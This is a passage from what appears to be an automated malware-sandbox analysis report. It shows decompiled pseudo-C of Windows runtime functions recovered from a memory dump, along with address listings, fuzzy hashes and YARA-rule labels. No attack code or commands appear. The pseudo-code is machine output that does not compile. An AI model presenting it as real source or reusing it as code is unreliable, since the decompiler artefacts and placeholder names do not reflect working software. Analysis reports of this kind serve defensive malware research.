									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x16c7b9c; // 0x0
									_t92 = L015F4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01619910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E015DA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0166E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0166E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E016195B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0166b8d9
0x0166b8e4
0x00000000
0x0166b8e6
0x0166b8f3
0x0166b8f5
0x0166b8f5
0x0166b8f8
0x0166b920
0x0166b924
0x0166b936
0x0166b939
0x0166b93d
0x0166b948
0x0166b9a0
0x0166b9a0
0x0166b9a4
0x0166b9bf
0x0166b9c4
0x0166b9c6
0x0166b9cd
0x0166b9d1
0x0166bad4
0x0166bad8
0x0166bada
0x0166badc
0x0166badc
0x0166badf
0x0166bae0
0x0166bae2
0x0166bae4
0x0166baec
0x0166baee
0x0166baf0
0x0166baf0
0x0166baec
0x0166bafb
0x0166bafc
0x0166bafe
0x0166bb01
0x0166bb01
0x00000000
0x0166bb06
0x0166b9d7
0x0166b9db
0x0166b9db
0x0166b9de
0x0166b9de
0x0166b9e4
0x0166b9e7
0x0166b9ea
0x0166b9ec
0x0166b9ef
0x0166b9f3
0x0166ba1b
0x0166ba1b
0x0166ba23
0x0166ba24
0x0166ba27
0x0166ba2a
0x0166ba2b
0x0166ba2e
0x0166ba30
0x0166ba37
0x0166ba3f
0x0166ba9c
0x0166baa2
0x0166bb13
0x0166bb15
0x0166baae
0x0166baae
0x0166bab3
0x0166bab5
0x0166baba
0x0166bac8
0x0166bac8
0x0166baba
0x0166bacd
0x0166bacf
0x00000000
0x0166bacf
0x0166bb1a
0x00000000
0x0166bb1c
0x0166baa7
0x0166bb11
0x00000000
0x0166bb11
0x0166baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0166ba41
0x0166ba41
0x0166ba41
0x0166ba58
0x0166ba5d
0x0166ba62
0x00000000
0x00000000
0x0166ba64
0x0166ba67
0x0166ba68
0x0166ba69
0x0166ba6c
0x0166ba6f
0x0166ba71
0x0166ba78
0x0166ba80
0x00000000
0x00000000
0x0166ba90
0x0166ba90
0x0166ba97
0x00000000
0x0166ba97
0x0166b9f5
0x0166b9f7
0x0166b9f7
0x0166b9fa
0x0166ba03
0x0166ba07
0x0166ba0c
0x0166ba10
0x0166ba17
0x00000000
0x0166b9f7
0x0166b9a6
0x0166b9a8
0x0166b9af
0x0166b9b3
0x00000000
0x00000000
0x0166b9b9
0x00000000
0x0166b9b9
0x0166b94d
0x0166b98f
0x0166b995
0x0166b999
0x0166b960
0x0166b967
0x0166b968
0x0166b96a
0x00000000
0x0166b96a
0x0166b99b
0x0166b99e
0x00000000
0x00000000
0x00000000
0x0166b99e
0x0166b951
0x0166b954
0x0166b95a
0x0166b95e
0x0166b972
0x0166b979
0x0166b97d
0x0166b97f
0x0166b980
0x0166b982
0x0166b984
0x00000000
0x0166b984
0x00000000
0x0166b926
0x00000000
0x0166b926

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96c0eddf98f411b95c647e6ed4bf66bcbe974b32eeafa291239552068b2d34e6
Instruction ID: 9a31c7014ccdd4a129d69edc3a5a73b9bbc34cf2dff51af2e8e80e0cc5ee36a7
Opcode Fuzzy Hash: 96c0eddf98f411b95c647e6ed4bf66bcbe974b32eeafa291239552068b2d34e6
Instruction Fuzzy Hash: B471CF32240702EFE7329F18CC44F6ABBBAEB44724F154528EA55DB6A0DB75E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01656DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E01656DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L015F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01656B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E015F7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E01619AE0();
					_t87 = L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0165795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0165795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0165795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0165795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L015F4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01656B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01656B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01656B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01656B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E015F7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E01619AE0();
								L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L015F2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L015F2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L015F2400( &_v52);
							}
							if(_v28 >= 0) {
								return L015F2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x01656dd4
0x01656dde
0x01656de1
0x01656de3
0x01656de6
0x01656de9
0x01656dec
0x01656def
0x01656df2
0x01656df5
0x01656dfe
0x01656e04
0x01656e09
0x01656e0d
0x01656e18
0x01656e1b
0x01656e22
0x01656e2d
0x01656e30
0x01656e36
0x01656e42
0x01656e4d
0x01656e50
0x01656e55
0x01656e5c
0x01656e6e
0x01656e5e
0x01656e67
0x01656e67
0x01656e73
0x01656e74
0x01656e77
0x01656e7c
0x01656e7d
0x01656e8e
0x01656e93
0x01656e9c
0x01656ea8
0x01656eab
0x01656eac
0x01656eb3
0x01656ecd
0x01656edc
0x01656ee2
0x01656ee5
0x01656ef2
0x01656efb
0x01656f01
0x01656f06
0x01656f0b
0x01656f11
0x01656f1a
0x01656f22
0x01656f26
0x01656f26
0x01656f33
0x01656f41
0x01656f44
0x01656f47
0x01656f54
0x01656f65
0x01656f77
0x01656f7c
0x01656f82
0x01656f91
0x01656f99
0x01656fa3
0x01656fae
0x01656fae
0x01656fba
0x01656fbb
0x01656fbc
0x01656fc1
0x01656fc2
0x01656fd3
0x01656fd8
0x01656fd8
0x01656fdf
0x01656fe8
0x01656fee
0x01656fee
0x01656ff5
0x01656ffb
0x01656ffb
0x01657004
0x00000000
0x0165700a
0x01657004
0x01656eb3
0x01656e9c
0x01657015

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 4c120ea7b038585187a5a6bbe0083ef5f40e23af29c5404ff3f71a20191ec10b
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: A5717171D0021AEFDB10DFA9C944ADEBBB9FF88710F504069E905EB250D730EA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 015D52A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E015D52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E015EEEF0(0x16c79a0);
					_t104 =  *0x16c8210; // 0x1172ce8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E015EEB70(_t93, 0x16c79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01619890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E015EEEF0(0x16c79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E015EEB70(0, 0x16c79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1172cf5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0160F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E015EEEF0(0x16c79a0);
									__eflags =  *0x16c8210 - _t104; // 0x1172ce8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x16c8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01654888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E015EEB70(_t95, 0x16c79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E016195D0();
											L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E016195D0();
											L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E015EEB70(_t93, 0x16c79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E016195D0();
										L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E016195D0();
										L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0160F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x015d52a5
0x015d52ad
0x015d52b0
0x015d52b3
0x015d52b7
0x015d52ba
0x015d52bf
0x015d52c4
0x015d52cc
0x00000000
0x00000000
0x015d52ce
0x015d52d9
0x015d52dd
0x015d52e7
0x015d52f7
0x015d52f9
0x015d52fd
0x01630dcf
0x01630dd5
0x01630dd6
0x01630dd7
0x01630dd8
0x01630dd9
0x01630dde
0x01630ddf
0x01630de0
0x01630de1
0x01630de2
0x01630de5
0x01630dea
0x01630dec
0x01630f60
0x01630f64
0x01630f70
0x01630f76
0x01630f79
0x01630f79
0x00000000
0x01630f64
0x01630df2
0x01630df7
0x01630e04
0x01630e0d
0x01630e0d
0x01630e10
0x01630e1a
0x01630e1c
0x01630e4c
0x01630e52
0x01630e61
0x01630e67
0x01630e6b
0x01630e70
0x01630e76
0x01630ed7
0x01630edc
0x01630ee0
0x01630ee6
0x01630eea
0x01630eed
0x01630ef0
0x01630ef3
0x01630ef6
0x01630ef9
0x01630efe
0x01630f01
0x01630f01
0x01630f0b
0x01630f12
0x01630f16
0x01630f18
0x01630f1b
0x01630f2c
0x01630f31
0x01630f31
0x01630f35
0x01630f39
0x01630f3a
0x01630f3c
0x01630f3f
0x01630f50
0x01630f55
0x01630f55
0x01630f59
0x015d52eb
0x015d52f1
0x015d52f1
0x01630e7d
0x01630e84
0x01630e88
0x01630e8a
0x01630e8d
0x01630e9e
0x01630ea3
0x01630ea3
0x01630ea7
0x01630eaf
0x01630eb3
0x01630eb9
0x01630eb9
0x01630ebc
0x01630ecd
0x01630ecd
0x00000000
0x01630eb3
0x01630e21
0x01630e2b
0x01630e2f
0x01630e30
0x01630e3a
0x01630e3f
0x01630e41
0x00000000
0x00000000
0x01630e47
0x00000000
0x01630e47
0x01630df9
0x01630dfe
0x00000000
0x00000000
0x00000000
0x01630dfe
0x015d5303
0x015d5307
0x00000000
0x015d5309
0x00000000
0x015d5309
0x015d5307
0x015d52e9
0x015d52e9
0x00000000
0x015d52e9
0x015d530e
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b69ae7c6ce4eb5d318f844835584840f87385a44b1404d2b5d9bfb2adf40dada
Instruction ID: 86bc849b0431f574318827ecd21fcb6ec15b943ea70cc9519500573b41f392ad
Opcode Fuzzy Hash: b69ae7c6ce4eb5d318f844835584840f87385a44b1404d2b5d9bfb2adf40dada
Instruction Fuzzy Hash: 1B51A971615342ABD721DF28CC45B2BBBE5FFA4710F14092EF4958B651E770E848CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01602AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01602AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x16c8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x16c8208; // 0x16c8207
				_t8 = _t57 + 0x16c8208; // 0x16c8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x16c8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x16c821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x16c6d5c; // 0x7fbf0654
							_t72 =  *0x16c6d5c; // 0x7fbf0654
							_t75 =  *0x16c6d5c; // 0x7fbf0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x16c6d5c; // 0x7fbf0654
							_t84 =  *0x16c6d5c; // 0x7fbf0654
							_t87 =  *0x16c6d5c; // 0x7fbf0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0161F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x01602ae4
0x01602aec
0x01602aef
0x01602af4
0x01602af7
0x01602afd
0x01602b92
0x01602b92
0x01602b97
0x01602b9c
0x01602b9c
0x01602b03
0x01602b06
0x01602b09
0x01602b09
0x01602b0f
0x01602b15
0x01602b15
0x01602b1b
0x01602b1e
0x01602b21
0x01602b26
0x01602b29
0x01602b81
0x01602b84
0x01602c0e
0x01602c15
0x01602c24
0x01602c24
0x01602b8a
0x01602b8a
0x01602b8a
0x01602b8a
0x01602b90
0x00000000
0x00000000
0x00000000
0x00000000
0x01602b4a
0x01602b4a
0x01602b4d
0x01602b53
0x00000000
0x00000000
0x01602b55
0x01602b58
0x01602bb7
0x01645d1b
0x01645d37
0x01645d47
0x01645d53
0x01602bbd
0x01602bbd
0x01602bbd
0x01602bb7
0x01602b5d
0x01602c2f
0x01645d5b
0x01645d77
0x01645d87
0x01645d93
0x01602c35
0x01602c35
0x01602c35
0x01602c2f
0x01602b65
0x01602b9f
0x01602ba2
0x01602b67
0x01602b67
0x01602b69
0x01602b6b
0x01602b6e
0x01602bc9
0x01602bcc
0x01602bcf
0x01602bd4
0x01602bd6
0x01602bd6
0x01602bdb
0x01602c02
0x01602c05
0x01602c07
0x00000000
0x01602c07
0x01602be0
0x01602c00
0x01602c3f
0x01602c3f
0x00000000
0x01602c00
0x01602be5
0x01602be7
0x01602bec
0x01602bf4
0x01602bf6
0x00000000
0x01602bf6
0x01602b70
0x01602b76
0x01602b2b
0x01602b2b
0x01602b2d
0x01602b2f
0x01602b32
0x01602b35
0x01602b3a
0x00000000
0x01602b40
0x01602b43
0x01602b45
0x01602b47
0x01602b4a
0x01602b4d
0x01602b53
0x00000000
0x00000000
0x00000000
0x01602b53
0x01602b78
0x01602b78
0x01602b7b
0x01602b7e
0x00000000
0x01602b7e
0x01602b76
0x01602ba5
0x01602ba5
0x01602ba8
0x01602bad
0x00000000
0x00000000
0x01602baf
0x01602baf
0x01602bc2
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed4fcdea01407505236a410d0c103f8c74786d9761ce1528e745180189faf762
Instruction ID: 542122917378a09049606d518e1903a83b78bbadb92473a98073595e2f559ccf
Opcode Fuzzy Hash: ed4fcdea01407505236a410d0c103f8c74786d9761ce1528e745180189faf762
Instruction Fuzzy Hash: B751C476A005258FCB29CF1CCCA89BEB7B1FF88704719845EE8469B395D734AA51C790

Uniqueness

Uniqueness Score: -1.00%

Function 0169AE44, Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0169AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0169C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0169ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0169FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0169EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E015F7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01691608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E016A1536(0x16c8ae4, (_t74 -  *0x16c8b04 >> 0x14) + (_t74 -  *0x16c8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0169C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0169A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
